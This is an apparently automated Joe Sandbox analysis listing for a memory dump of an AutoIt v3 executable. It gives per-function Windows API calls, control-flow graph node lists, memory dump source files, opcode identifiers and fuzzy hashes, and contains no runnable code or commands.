                                                                                                          control_flow_graph 1319 e55d13-e55d73 call e51207 GetVersionExW call e51821 1324 e55d79 1319->1324 1325 e55e78-e55e7a 1319->1325 1327 e55d7c-e55d81 1324->1327 1326 e90fa9-e90fb5 1325->1326 1328 e90fb6-e90fba 1326->1328 1329 e55d87 1327->1329 1330 e55e7f-e55e80 1327->1330 1332 e90fbd-e90fc9 1328->1332 1333 e90fbc 1328->1333 1331 e55d88-e55dbf call e51981 call e5133d 1329->1331 1330->1331 1342 e55dc5-e55dc6 1331->1342 1343 e91098-e9109b 1331->1343 1332->1328 1335 e90fcb-e90fd0 1332->1335 1333->1332 1335->1327 1336 e90fd6-e90fdd 1335->1336 1336->1326 1338 e90fdf 1336->1338 1341 e90fe4-e90fea 1338->1341 1344 e55e00-e55e17 GetCurrentProcess IsWow64Process 1341->1344 1345 e90fef-e90ffa 1342->1345 1346 e55dcc-e55dcf 1342->1346 1347 e9109d 1343->1347 1348 e910b4-e910b8 1343->1348 1353 e55e1c-e55e2d 1344->1353 1354 e55e19 1344->1354 1349 e90ffc-e91002 1345->1349 1350 e91017-e91019 1345->1350 1346->1344 1351 e55dd1-e55def 1346->1351 1352 e910a0 1347->1352 1355 e910ba-e910c3 1348->1355 1356 e910a3-e910ac 1348->1356 1357 e9100c-e91012 1349->1357 1358 e91004-e91007 1349->1358 1360 e9101b-e91027 1350->1360 1361 e9103c-e9103f 1350->1361 1351->1344 1359 e55df1-e55df7 1351->1359 1352->1356 1363 e55e2f-e55e3f call e555f0 1353->1363 1364 e55e98-e55ea2 GetSystemInfo 1353->1364 1354->1353 1355->1352 1362 e910c5-e910c8 1355->1362 1356->1348 1357->1344 1358->1344 1359->1341 1365 e55dfd 1359->1365 1366 e91029-e9102c 1360->1366 1367 e91031-e91037 1360->1367 1369 e91041-e91050 1361->1369 1370 e91065-e91068 1361->1370 1362->1356 1378 e55e41-e55e4e call e555f0 1363->1378 1379 e55e8c-e55e96 GetSystemInfo 1363->1379 1368 e55e65-e55e75 1364->1368 1365->1344 1366->1344 1367->1344 1373 e9105a-e91060 1369->1373 1374 e91052-e91055 1369->1374 1370->1344 1372 e9106e-e91083 1370->1372 1376 e9108d-e91093 1372->1376 1377 e91085-e91088 1372->1377 1373->1344 1374->1344 1376->1344 1377->1344 1384 e55e85-e55e8a 1378->1384 1385 e55e50-e55e54 GetNativeSystemInfo 1378->1385 1381 e55e56-e55e5a 1379->1381 1381->1368 1383 e55e5c-e55e5f FreeLibrary 1381->1383 1383->1368 1384->1385 1385->1381
                                                                                                          APIs
                                                                                                          • GetVersionExW.KERNEL32(?), ref: 00E55D40
                                                                                                            • Part of subcall function 00E51821: _memmove.LIBCMT ref: 00E5185B
                                                                                                          • GetCurrentProcess.KERNEL32(?,00ED0A18,00000000,00000000,?), ref: 00E55E07
                                                                                                          • IsWow64Process.KERNEL32(00000000), ref: 00E55E0E
                                                                                                          • GetNativeSystemInfo.KERNEL32(00000000), ref: 00E55E54
                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00E55E5F
                                                                                                          • GetSystemInfo.KERNEL32(00000000), ref: 00E55E90
                                                                                                          • GetSystemInfo.KERNEL32(00000000), ref: 00E55E9C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 1986165174-0
                                                                                                          • Opcode ID: 7069bf43e10f010b5c25c4ed94aaada016075dc80d12901f7896c8803525037b
                                                                                                          • Instruction ID: 476953823ed15269fdfe0e196c484645c668271ffb75ef901a91658e1349a1bb
                                                                                                          • Opcode Fuzzy Hash: 7069bf43e10f010b5c25c4ed94aaada016075dc80d12901f7896c8803525037b
                                                                                                          • Instruction Fuzzy Hash: 3C91E53254ABC0DECB31CB6494611AABFE5AF25301F881E9ED4C7A3A41D631B64CC759
                                                                                                          Function 00EA4005 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1386 ea4005-ea404c call e51207 * 3 call e60284 call ea4fec 1397 ea404e-ea4057 call e51900 1386->1397 1398 ea405c-ea408d call e60119 FindFirstFileW 1386->1398 1397->1398 1402 ea408f-ea4091 1398->1402 1403 ea40fc-ea4103 FindClose 1398->1403 1402->1403 1405 ea4093-ea4098 1402->1405 1404 ea4107-ea4129 call e51cb6 * 3 1403->1404 1407 ea409a-ea40d5 call e51c9c call e517e0 call e51900 DeleteFileW 1405->1407 1408 ea40d7-ea40e9 FindNextFileW 1405->1408 1407->1408 1421 ea40f3-ea40fa FindClose 1407->1421 1408->1402 1409 ea40eb-ea40f1 1408->1409 1409->1402 1421->1404
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E60284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E52A58,?,00008000), ref: 00E602A4
                                                                                                            • Part of subcall function 00EA4FEC: GetFileAttributesW.KERNEL32(?,00EA3BFE), ref: 00EA4FED
                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00EA407C
                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 00EA40CC
                                                                                                          • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00EA40DD
                                                                                                          • FindClose.KERNEL32(00000000), ref: 00EA40F4
                                                                                                          • FindClose.KERNEL32(00000000), ref: 00EA40FD
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                          • String ID: \*.*
                                                                                                          • API String ID: 2649000838-1173974218
                                                                                                          • Opcode ID: d84e56c12eb4b839eb0365127bb2014883eb2376ae7245bdfab52a39f989d5fd
                                                                                                          • Instruction ID: 4a413c4035146e5fbb19c2b38bda7600b6e55c21c000c156eaf56e6994a13e63
                                                                                                          • Opcode Fuzzy Hash: d84e56c12eb4b839eb0365127bb2014883eb2376ae7245bdfab52a39f989d5fd
                                                                                                          • Instruction Fuzzy Hash: 6631C3710093449FC304EB60D895AAFB7E8BF96305F442E5DF8D1A21D2EB61AA0CD753
                                                                                                          Function 00EA4148 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00EA416D
                                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00EA417B
                                                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 00EA419B
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00EA4245
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                          • String ID:
                                                                                                          • API String ID: 420147892-0
                                                                                                          • Opcode ID: d7cbfb94232591d498d38a50665045f097f571a8ed2e51f37bc65423f43d5b2b
                                                                                                          • Instruction ID: de92300579284359e962cbfcf22ba8a700219704e3c85a64e07da2e79f52da16
                                                                                                          • Opcode Fuzzy Hash: d7cbfb94232591d498d38a50665045f097f571a8ed2e51f37bc65423f43d5b2b
                                                                                                          • Instruction Fuzzy Hash: 0131E4711083019FC300EF50E885BAFBBE8EFD9305F50192DF581A61E1EBB1A948CB52
                                                                                                          Function 00E4B020 Relevance: 5.6, APIs: 3, Instructions: 1146COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E53740: CharUpperBuffW.USER32(?,00F071DC,00000002,?,00000000,00F071DC,?,00E453A5,?,?,?,?), ref: 00E5375D
                                                                                                          • _memmove.LIBCMT ref: 00E4B68A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BuffCharUpper_memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 2819905725-0
                                                                                                          • Opcode ID: 16963bd05c442b87530e82849734ef1f3f55e55f69e6c0de1111092f43723748
                                                                                                          • Instruction ID: 9ed68e0973e3f62fdb900656c5a586e1911cb2f93e8bac43c12295a7c1e0030c
                                                                                                          • Opcode Fuzzy Hash: 16963bd05c442b87530e82849734ef1f3f55e55f69e6c0de1111092f43723748
                                                                                                          • Instruction Fuzzy Hash: 4FA27A706083419FD720DF24D480B6AB7E1FF88708F14A95DE89AAB362D771ED45CB92
                                                                                                          Function 00EA494A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetFileAttributesW.KERNEL32(?,00E8FC86), ref: 00EA495A
                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00EA496B
                                                                                                          • FindClose.KERNEL32(00000000), ref: 00EA497B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileFind$AttributesCloseFirst
                                                                                                          • String ID:
                                                                                                          • API String ID: 48322524-0
                                                                                                          • Opcode ID: 23c0e703c8a1129108f9f1de2630bf0553391214a7fa0654da80632ba0ce316f
                                                                                                          • Instruction ID: 349920bc3e95372ffc1c98e4df5a652bedfe121525e7a420e19bf6a0ffe381dd
                                                                                                          • Opcode Fuzzy Hash: 23c0e703c8a1129108f9f1de2630bf0553391214a7fa0654da80632ba0ce316f
                                                                                                          • Instruction Fuzzy Hash: 17E0D8724125069B53106B38FC0D4EB7B5CDF8B339F140706F435E10E0E7B0A9584695
                                                                                                          Function 00E494E0 Relevance: 3.5, APIs: 2, Instructions: 539COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 67d0d9b6e3da3b9f965ad3d60e69d1ebf1bcd8ba3c9a07a5353ffecc66525aa8
                                                                                                          • Instruction ID: 16d2d36e2c848e8368db0dee4c40141b71f81c44fd9e9045f1acdd05a87d80dd
                                                                                                          • Opcode Fuzzy Hash: 67d0d9b6e3da3b9f965ad3d60e69d1ebf1bcd8ba3c9a07a5353ffecc66525aa8
                                                                                                          • Instruction Fuzzy Hash: 7622AE74A00215DFDB14DF58E484AAFB7F0FF49304F14916AE95ABB352D334A981CB91
                                                                                                          Function 00E60E38 Relevance: 3.1, APIs: 2, Instructions: 94nativethreadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseHandleResumeThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 3265327148-0
                                                                                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                          • Instruction ID: 07f5c63f6e8cb22011c2594f59151056c21dc814d681dbb9a98e1ad5cdaf6722
                                                                                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                          • Instruction Fuzzy Hash: 49310B70A40129DFCB18DF48E48096AF7A5FF59384B649A95E409EB251E732EDC1CBC0
                                                                                                          Function 00E4BC70 Relevance: 50.4, APIs: 22, Strings: 6, Instructions: 1379sleeptimeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • timeGetTime.WINMM ref: 00E4BF57
                                                                                                            • Part of subcall function 00E452B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E452E6
                                                                                                          • Sleep.KERNEL32(0000000A,?,?), ref: 00E836B5
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessagePeekSleepTimetime
                                                                                                          • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
                                                                                                          • API String ID: 1792118007-922114024
                                                                                                          • Opcode ID: 7081a0c149c204aa9f76a21457c93b03207e6647c57c36c4f9e717230951dd12
                                                                                                          • Instruction ID: 226e8d05958351b612cd6bce9e8953e68937576f36b03786d42192dce3995c0e
                                                                                                          • Opcode Fuzzy Hash: 7081a0c149c204aa9f76a21457c93b03207e6647c57c36c4f9e717230951dd12
                                                                                                          • Instruction Fuzzy Hash: 32C2AE70608341DFC728EF24D884BAAB7E4FF84704F14695DE48EA72A1DB71E949CB52
                                                                                                          Function 00E433E6 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 72windowregistryCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00E43444
                                                                                                          • RegisterClassExW.USER32(00000030), ref: 00E4346E
                                                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E4347F
                                                                                                          • InitCommonControlsEx.COMCTL32(?), ref: 00E4349C
                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E434AC
                                                                                                          • LoadIconW.USER32(000000A9), ref: 00E434C2
                                                                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E434D1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                          • API String ID: 2914291525-1005189915
                                                                                                          • Opcode ID: fa7fd76ec226f74b80b5d4faac012e68972f1515b76f552a14082447f137000a
                                                                                                          • Instruction ID: 99ca94eba552e111112f6f87367ee2dea3a103740d48dcb5ba5a5e17972857f4
                                                                                                          • Opcode Fuzzy Hash: fa7fd76ec226f74b80b5d4faac012e68972f1515b76f552a14082447f137000a
                                                                                                          • Instruction Fuzzy Hash: 3B315871D45309EFDB40AFA4EC89BCDBBF0FB09310F14419AE590A62A0E3B51586CF91
                                                                                                          Function 00E43411 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00E43444
                                                                                                          • RegisterClassExW.USER32(00000030), ref: 00E4346E
                                                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E4347F
                                                                                                          • InitCommonControlsEx.COMCTL32(?), ref: 00E4349C
                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E434AC
                                                                                                          • LoadIconW.USER32(000000A9), ref: 00E434C2
                                                                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E434D1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                          • API String ID: 2914291525-1005189915
                                                                                                          • Opcode ID: f7740e33d5d68af5d9780886fc1dc7f58ef0dc7769ee7bcfabc69e6c2db5fc5d
                                                                                                          • Instruction ID: 0754161cd39f412098188260379fafc45b18b259d585b79d0cea6cf2890bc272
                                                                                                          • Opcode Fuzzy Hash: f7740e33d5d68af5d9780886fc1dc7f58ef0dc7769ee7bcfabc69e6c2db5fc5d
                                                                                                          • Instruction Fuzzy Hash: 3821D0B1D05308AFDB40AFA5ED89B9DBBF4FB08700F14815AF610AA2A0D7B16544DFA1
                                                                                                          Function 00E52FC5 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                            • Part of subcall function 00E600CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00E53094), ref: 00E600ED
                                                                                                            • Part of subcall function 00E608C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00E5309F), ref: 00E608E3
                                                                                                          • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00E530E2
                                                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00E901BA
                                                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00E901FB
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00E90239
                                                                                                          • _wcscat.LIBCMT ref: 00E90292
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                          • API String ID: 2673923337-2727554177
                                                                                                          • Opcode ID: ef00fbd32fb95a66a3125f7627a094a19848b7c42551876f9c9a6a434f07616d
                                                                                                          • Instruction ID: e7adf94f567a3017d4f13d5d662049237bc09194a71f88a97ee0670312b3a61e
                                                                                                          • Opcode Fuzzy Hash: ef00fbd32fb95a66a3125f7627a094a19848b7c42551876f9c9a6a434f07616d
                                                                                                          • Instruction Fuzzy Hash: 7C718E715057059EC704EF25EC4596BBBE8FF84380F80292EF985A32B1EF70994ADB52
                                                                                                          Function 00E5514C Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00E55156
                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00E55165
                                                                                                          • LoadIconW.USER32(00000063), ref: 00E5517C
                                                                                                          • LoadIconW.USER32(000000A4), ref: 00E5518E
                                                                                                          • LoadIconW.USER32(000000A2), ref: 00E551A0
                                                                                                          • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E551C6
                                                                                                          • RegisterClassExW.USER32(?), ref: 00E5521C
                                                                                                            • Part of subcall function 00E43411: GetSysColorBrush.USER32(0000000F), ref: 00E43444
                                                                                                            • Part of subcall function 00E43411: RegisterClassExW.USER32(00000030), ref: 00E4346E
                                                                                                            • Part of subcall function 00E43411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E4347F
                                                                                                            • Part of subcall function 00E43411: InitCommonControlsEx.COMCTL32(?), ref: 00E4349C
                                                                                                            • Part of subcall function 00E43411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E434AC
                                                                                                            • Part of subcall function 00E43411: LoadIconW.USER32(000000A9), ref: 00E434C2
                                                                                                            • Part of subcall function 00E43411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E434D1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                          • String ID: #$0$AutoIt v3
                                                                                                          • API String ID: 423443420-4155596026
                                                                                                          • Opcode ID: 2214bd01da95412c114ccd4923a369a1f0aadcead7b63c008b47cda68e251683
                                                                                                          • Instruction ID: 544bc20a07bb6e60c97458a0a7fdcaf4223a3ef3d12fb4b5725d357149a7abb4
                                                                                                          • Opcode Fuzzy Hash: 2214bd01da95412c114ccd4923a369a1f0aadcead7b63c008b47cda68e251683
